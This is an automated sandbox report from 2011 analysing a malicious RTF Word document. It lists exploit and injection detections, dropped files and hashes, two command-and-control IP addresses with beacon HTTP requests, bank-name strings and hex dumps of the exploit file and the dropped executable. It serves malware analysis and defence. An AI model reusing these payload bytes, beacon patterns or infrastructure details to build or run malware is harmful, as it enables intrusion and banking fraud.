ANALYSIS OVERVIEWNETWORK DATAHOOKSCOLLAPSE ALL

Joebox - Abstract Analysis File 10635
+ General information
Joebox version: 4.5.0
Start time: 13:29:33
Start date: 13/12/2011
Overall analysis duration: 0h 3m 32s
Target binary file name: 09D68EF693AC6B7D3ACF0DDFF0585543.doc
Target script file name: default.jbs
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Errors:
    + Classification / Threat Score
    Persistence, Installation, Boot Survival:
    Hidding, Stealthness, Detection and Removal Protection:
    Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
    Spreading:
    Exploiting:
    Networking:
    Data spying, Sniffing, Keylogging, Ebanking Fraud:
    + Signature Detections
    • Creates temporary files
    • Printf formatting strings found in memory and binary data
    • Spawns processes
    • Urls found in memory or binary data
    • Downloads files from webservers via HTTP
    • Allocates memory in foreign processes
    • Document exploit detected (droppes PE files)
    • Found strings which match to known bank urls
    • Injects a PE file into a foreign processes
    • Modifies the context of a thread in another process (thread injection)
    • Writes to foreign memory regions
    Static File Information
    + General Information
    File name: 09D68EF693AC6B7D3ACF0DDFF0585543.doc
    File size: 58531
    MD5: 09d68ef693ac6b7d3acf0ddff0585543
    SHA1: e81ffb8c6cd58c5823ce8e9ab3d2ed5c076211c5
    SHA256: 41aac004dcadbdb87eac1df7f82d2fb70eb65a43c8bc6a65129c7bffed859c32
    File type: Rich Text Format data, version 1, unknown character set
    String Analysis
    + Formattings for printf style functions
    String value Source
    CPenIMX(sketch)::OnKillThreadFocus(); _GetOnOff() returns %s. WINWORD.EXE
    %f7A{[ services.exe
    Sketch-Ink version=%s WINWORD.EXE
    |%SystemRoot%\system32\rsvpsp.dll services.exe
    http://%s:%d/%s.php?id=%06d%s S, services.exe
    #S%T%U%P%W%V%Y%Z%[%\%]%N%_%`%a%b%c%d%e%f%g%X%i%h%k%^%m%R%o%p%q%l%s%j%u%n%w%x%y%t%{% WINWORD.EXE
    %SystemRoot%\Debug\UserMode\userenv.bak WINWORD.EXE, services.exe
    CTipFunctionProvider(sketch)::GetFunction %s WINWORD.EXE
    CWndMain(sketch)::Enable(fEnable=%s) WINWORD.EXE
    SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X WINWORD.EXE
    CTipFunctionProvider(sketch)::GetFunction(...,...,%s) WINWORD.EXE
    https://office.bcentral.com/eServices/index?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    %SystemRoot%\Debug\UserMode\userenv.log WINWORD.EXE, services.exe
    >%PP@lw WINWORD.EXE
    %d.%03d %d.%03d scale WINWORD.EXE
    ?%IF?P WINWORD.EXE
    %s\%s\%s\%s\%s\%s services.exe
    >%uE=u WINWORD.EXE
    %F?n=>A_p|@ WINWORD.EXE
    P?d%P?hrP?\%P?drP?\rP?XrP?TrP?PrP?LrP?HrP?p*P?DrP? WINWORD.EXE
    cAP%G? WINWORD.EXE
    ?9DPW@%I WINWORD.EXE
    %SystemRoot%\System32\mswsock.dll services.exe
    %s\%s\%s\%s\%s services.exe
    %P?T%P?<rP?XJP?`JP?8rP? rP? WINWORD.EXE
    ?P%G?P%G? WINWORD.EXE
    Pw%n[w services.exe
    %ls %ls services.exe
    %d.%d.%d.%d WINWORD.EXE
    Cicero version=%s WINWORD.EXE
    A%emC{ services.exe
    "%s"="%s" S, services.exe
    running from location : %s WINWORD.EXE
    http://office.bcentral.com/eServices/error?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    CPenIMX(sketch)::OnChange(); _GetOnOff() returns %s. WINWORD.EXE
    Assertion failed: %s, file %s, line %d WINWORD.EXE, services.exe
    CWndMain(sketch)::Show(fShow=%s) %s WINWORD.EXE
    K%L%M% WINWORD.EXE
    /%s.php?id=%06d%s&ext=%s S, services.exe
    \{zyxwvutsrYRon%Lkjihgfedcba`_^]\[ZYXWVYuSRMqON}mKJ WINWORD.EXE
    B%C%E%F%A%?%I% WINWORD.EXE
    9VhB'E+=tz}k?ESog*ncOpl%I}r@`ZBY.-uOSQqUfGN0btM?'2Oyf}w_uikMrD)9fei?o0wwgL03lq*+yI6Rm5s@{$6ocakSuz~oj@_mNZUAcSrBF(HX=6Kb,.m+A?s9%=b@WUg7L4^yP$5VM`n?]6_,XZinE*%Oh)y{K4a?tm3gEyqpQJuKOA-qwPg8ug't_'Ykt?lSr8feNZ,?E`6_Xm.aQ. WINWORD.EXE
    %n Options\WINWOR WINWORD.EXE
    %systemroot%\system32\com\dmp WINWORD.EXE
    CPenIMX::_ICCallback(%s,%08X,...) WINWORD.EXE
    CPenIMX(sketch)::_EditInk(...,%s,%s) WINWORD.EXE
    %d %d %d %d services.exe
    D%H%G% WINWORD.EXE
    IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 WINWORD.EXE
    WISP - %s WINWORD.EXE
    /%s.php?id=%06d%s S, services.exe
    text/x-ms-odc; charset=%s WINWORD.EXE
    CPenIMX(sketch)::EditInk(%s) WINWORD.EXE
    erJ `%I" services.exe
    CWndMain(sketch)::ShowHideUI() GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s bShowMain=%s bEnable=%s WINWORD.EXE
    %F?ZJZ? WINWORD.EXE
    >N%X@1 WINWORD.EXE
    @rX<>Q%G?O%G?P%G? WINWORD.EXE
    %d.%03d %d.%03d translate WINWORD.EXE
    https://office.bcentral.com/eServices/service?Command=WebPost&DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    >s%GAZ WINWORD.EXE
    I%L{3w WINWORD.EXE, S.dr
    %d.%03d %d.%03d translate %d.%03d rotate %d.%03d %d.%03d translate WINWORD.EXE
    CLSID\%s\InprocServer32 WINWORD.EXE
    http://%s:%d/%s.php?id=%06d%s&ext=%s S, services.exe
    %d,%d,%d,%d WINWORD.EXE
    %c%c%c%c%c%c.exe S, services.exe
    %systemroot%\Registration WINWORD.EXE
    B9%IB2 WINWORD.EXE
    %d.%03d 0 translate -1 1 scale WINWORD.EXE
    %s File WINWORD.EXE
    %s "%s" WINWORD.EXE, S.dr
    CPenIMX::_DIMCallback(%s,%08X,%08X,...) WINWORD.EXE
    %eOptions WINWORD.EXE
    O28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 WINWORD.EXE
    DragDrop%lx WINWORD.EXE, services.exe
    %u{0>) WINWORD.EXE
    >\%P=i WINWORD.EXE
    Sketch TIP version=1.00.2297.1 m_langIDCurrent=0x%04X %s WINWORD.EXE
    CPenIMX(sketch)::OnSetThreadFocus(); _GetOnOff() returns %s. WINWORD.EXE
    %c%c%c%c%c S, services.exe
    CPenIMX(sketch)::ActivateUI(...); GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s. WINWORD.EXE
    %%temp%%\%u S, services.exe
    AP%G?Q%G? WINWORD.EXE
    ache%OLK* S, WINWORD.EXE
    %SystemRoot%\system32\rsvpsp.dll services.exe
    SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X\%s WINWORD.EXE
    A%l[ABa WINWORD.EXE
    %SystemRoot%\System32\winrnr.dll services.exe
    %SystemRoot%\system32\mswsock.dll services.exe
    + URLs
    String value Source
    http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    http://officeupdate.microsoft.com WINWORD.EXE
    http://schemas.microsoft.com/sharepoint/soap/directory/ WINWORD.EXE
    http://schemas.xmlsoap.org/soap/envelope/ WINWORD.EXE
    http://www.w3.org/2001/xmlschema WINWORD.EXE
    http://www.w3.org/2001/xmlschema-instance WINWORD.EXE
    https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    + Bank names
    String value Source
    Banco equals www.banco.colpatria.com (Banco Colpatria) WINWORD.EXE
    Continental equals www.continental.fin.ec (Banco Continental) WINWORD.EXE
    banco equals www.banco.colpatria.com (Banco Colpatria) WINWORD.EXE
    Analysis Overview
    + Startup
    • system is xp
    • WINWORD.EXE (PID: 1888 MD5: 5FEAF6AB43AA477597F9F8DB0E8CB69C)
      • S (PID: 1568 MD5: 5EA58C5F12405A4E959234134123380D)
        • services.exe (PID: 388 MD5: 65DF52F5B8B6E9BBD183505225C37315)
      • WINWORD.EXE (PID: 296 MD5: 5FEAF6AB43AA477597F9F8DB0E8CB69C)
    • svchost.exe (PID: 1384 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
    • cleanup
    + Dropped Files
    File Path MD5
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc 2CA47ABE5A226750E17B9675DC9A5CD7
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 5EA58C5F12405A4E959234134123380D
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc A0F4BD67F4388E1BC61D5DBB85D5650F
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC 02007C8874154CE60296EBAA940D2882
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc 2E411E6AEC50BEC23979B3EE7E5DC1E2
    + Involved IP Addresses
    IP ASN ASN Description ANS State
    65.87.199.102 unknown unknown US
    99.1.23.71 unknown unknown US
    Global Network Data
    + All TCP
    Timestamp Source Port Dest Port Source IP Dest IP
    Dec 13, 2011 13:31:02.149522066 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.149549961 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:02.149774075 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.204344988 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.204360008 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.809300900 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.809789896 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:03.810985088 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:03.810998917 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.988101959 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.988130093 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:03.988451958 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.997524023 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.997539043 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:05.174400091 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:05.174978971 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:05.175539017 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:05.175554991 CET 443 1033 65.87.199.102 192.168.0.10
    + HTTP
    Timestamp Source Port Dest Port Source IP Dest IP Header
    Dec 13, 2011 13:31:02.204344988 CET 1032 443 192.168.0.10 99.1.23.71 GET /kbfmc.php?id=03239819113874GCC5 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 99.1.23.71:443
    Connection: Keep-Alive
    Cache-Control: no-cache
    Dec 13, 2011 13:31:03.997524023 CET 1033 443 192.168.0.10 65.87.199.102 GET /kbfmc.php?id=02889319113874GCC5 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 65.87.199.102:443
    Connection: Keep-Alive
    Cache-Control: no-cache
    Hooks
    + Device Extensions
    Driver Device Extension Before Extension After
    \Driver\NdisTapi \Device\NdisTapi 81 84 E5 28 00 00 00 01 00 00 00 00 81 85 FC 80 00 00 00 00 00 00 00 00 81 84 E5 28 00 00 00 00 00 00 00 02 81 85 FC 80 00 00 00 00 00 00 00 02
    Analysis File: WINWORD.EXE PID: 1888 Parent PID: 176
    + Sections
    + General
    Start time: 04:13:04
    Start date: 13/12/2011
    Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
    Commandline: not known
    Imagebase: 0x30000000
    File size: 12047560 bytes
    MD5 hash: 5FEAF6AB43AA477597F9F8DB0E8CB69C
    File Activities:
    + File created
    File Path Access Attributes Options Completion Count Source Address
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 123963
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 1239FE
    + File written
    File Path Offset Length Value Completion Count Source Address
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc none 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 300408C8
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc none 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 4E 01 0A 00 32 01 02 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 success or wait 1 300408C8
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S none 17925 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 123990
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc none 23552 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 29 00 00 00 00 00 00 00 00 10 00 00 2B 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 28 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 123A1A
    + File read
    File Path Offset Length Value Completion Count Source Address
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 2 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 30 65 39 65 39 30 30 30 30 30 30 35 38 33 65 38 62 31 38 33 65 38 39 31 63 30 65 34 31 34 30 33 65 38 30 33 63 30 65 30 30 37 35 66 30 33 65 38 39 37 37 35 30 36 61 30 30 36 61 30 30 36 61 30 32 36 61 30 30 36 61 30 30 36 38 30 30 30 30 30 30 34 30 33 65 66 66 37 37 35 30 33 65 66 66 35 37 31 34 33 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 EC 9B DE FD E3 DB FA F0 E6 FE F4 D8 EE E0 E9 E0 EE CB 89 88 29 84 D7 E1 E2 E6 D1 F2 10 1D 18 0F 08 37 1C 15 18 04 0C 74 BE 73 36 15 1B 3A 05 1E 0E 0B 0D 2B 08 08 11 01 1B 16 61 60 2A 5D 0B 35 29 2E 2C 39 3B 17 39 38 3C 31 51 50 2F 4E 0E 3E 2E 2B 3D 2D 17 34 2A 27 26 31 32 01 3F 3E 56 3D 7C 5F 4D 74 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 5E AC 83 1C 06 CA DB 58 9E 9A A6 E0 05 C4 20 C6 11 80 26 80 7D 78 44 CB D4 B1 BE D5 67 7E 32 6C C7 D9 F7 8D 0D 33 04 FD A5 0B 93 6A C1 D6 6D D4 0A F3 C2 0B EF 0C F3 AD 43 8D A6 F9 42 C2 CD EB 21 C4 A0 81 B9 B8 D6 AC B2 77 DA F1 6D DD A8 93 BD 72 3D 74 85 C9 64 89 2A 94 90 9B 29 B0 A8 88 22 18 C1 10 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 C2 4C 1F E6 3D CA 26 0D CB EE 49 73 6E 1A 07 25 C7 FB 6D 50 86 9C 5D ED C6 8A 97 F0 AE 9B 65 0E 36 E0 96 B5 81 46 C8 D2 EE 3F 2D 46 C0 7B B0 AC B7 B7 F1 AD 6E 94 AB D3 DD 29 C2 92 4C 3D CB 7C 06 22 8A 15 ED 6F BF 42 C1 F6 D2 7A 83 14 45 16 C7 0B 74 96 FA 4F F9 97 BD 82 4C 1E CE 21 56 6D DE 21 4B 04 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 86 DF 50 A2 98 19 EA A0 6F D7 DE 15 71 8B D8 44 AF 41 E6 1D 52 B4 94 BF 14 03 38 03 44 47 A4 FB 9D 52 99 95 45 C5 56 3B 60 13 EB 67 E4 76 6F 5D ED 07 10 7B 8F D0 E0 54 9C A4 14 5C 4F E3 83 79 A0 31 DA 90 A4 37 9C 92 D7 C3 F0 24 EC 2A 43 F9 39 43 B4 E7 85 AA 6B 7B 51 55 F8 31 CF E8 F9 0D 01 37 B4 5D success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 00 00 00 00 00 9C 0B 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 02 00 0C 01 00 00 00 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 4096 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 1187 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30292E63
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc none 58531 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 1 123929
    + Other file operations
    File Path Disposition Data Ascii Data Completion Count Source Address
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc PositionInformation Offset: 58531 success or wait 17 301CCD6E
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 774144 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 774144 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read and execute and extend size unknown 8C0000 774144 own pid readonly object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read reserve A10000 126976 own pid read write success or wait 1
    \KnownDlls\uxtheme.dll write and read and execute unknown A10000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
    C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
    \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
    \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000 262144 own pid read write success or wait 1
    \KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AA0000 1753088 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AA0000 1753088 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read and execute and extend size unknown AA0000 1753088 own pid readonly object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read reserve C50000 126976 own pid read write success or wait 1
    \KnownDlls\msi.dll write and read and execute unknown C50000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit DA0000 966656 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 962560 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
